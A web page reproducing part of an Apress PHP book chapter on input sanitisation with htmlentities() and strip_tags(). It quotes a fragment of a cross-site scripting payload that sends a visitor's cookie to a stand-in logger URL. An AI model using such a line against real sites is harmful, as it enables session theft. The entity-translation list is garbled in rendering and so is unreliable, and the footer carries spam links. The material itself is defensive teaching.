Home arrow PHP arrow Secure Encrypting and Decrypting for Your PHP Website

Secure Encrypting and Decrypting for Your PHP Website

In this conclusion to a three-part series on secure PHP programming, you'll learn how to validate inputs, handle hashing, use the MCrypt package, and more. This article is excerpted from chapter 21 of the book Beginning PHP and Oracle: From Novice to Professional, written by W. Jason Gilmore and Bob Bryla (Apress; ISBN: 1590597702).

  1. Secure Encrypting and Decrypting for Your PHP Website
  2. Taking Advantage of PEAR: Validate
  3. Data Encryption
  4. The MCrypt Package
By: Apress Publishing
Rating: starstarstarstarstar / 1
August 26, 2010

print this article



Converting Input into HTML Entities

The htmlentities() function converts certain characters that have special meaning in an HTML context to strings that a browser can render as provided rather than execute them as HTML. Its prototype follows:

string htmlentities(string input [, int quote_style [, string charset]])

Five characters in particular are considered special by this function:

  1. & will be translated to &
  2. " will be translated to "  (when quote_style is set to ENT_NOQUOTES
  3. > will be translated to > 
  4. < will be translated to &lt; 
  5. ' will be translated to &#039; (when quote_style is set to ENT_QUOTES )

Returning to the cross-site scripting example, if the userís input is passed through htmlspecialchars() rather than embedded into the page and executed as JavaScript, the input would instead be displayed exactly as it is input because it would be translated like so:

document.location ='http://www.example.org/logger.php?cookie=' +

Stripping Tags from User Input

Sometimes it is best to completely strip user input of all HTML input, regardless of intent. For instance, HTML-based input can be particularly problematic when the information is displayed back to the browser, as is the case of a message board. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all. This problem can be eliminated by passing the user input through strip_tags() , which removes all HTML tags from a string. Its prototype follows:

string strip_tags(string str [, string allowed_tags])

The input parameter str is the string that will be examined for tags, while the optional input parameter allowed_tags specifies any tags that you would like to be allowed in the string. For example, italic tags ( <i></i> ) might be allowable, but table tags such as <td></td> could potentially wreak havoc on a page. An example follows:

$input = "I <td>really</td> love <i>PHP</i>!";
$input = strip_tags($input,"<i></i>");
// $input now equals "I really love <i>PHP</i>!"

>>> More PHP Articles          >>> More By Apress Publishing

blog comments powered by Disqus
escort Bursa Bursa escort Antalya eskort


- Hackers Compromise PHP Sites to Launch Attac...
- Red Hat, Zend Form OpenShift PaaS Alliance
- PHP IDE News
- BCD, Zend Extend PHP Partnership
- PHP FAQ Highlight
- PHP Creator Didn't Set Out to Create a Langu...
- PHP Trends Revealed in Zend Study
- PHP: Best Methods for Running Scheduled Jobs
- PHP Array Functions: array_change_key_case
- PHP array_combine Function
- PHP array_chunk Function
- PHP Closures as View Helpers: Lazy-Loading F...
- Using PHP Closures as View Helpers
- PHP File and Operating System Program Execut...
- PHP: Effects of Wrapping Code in Class Const...

Developer Shed Affiliates


Dev Shed Tutorial Topics: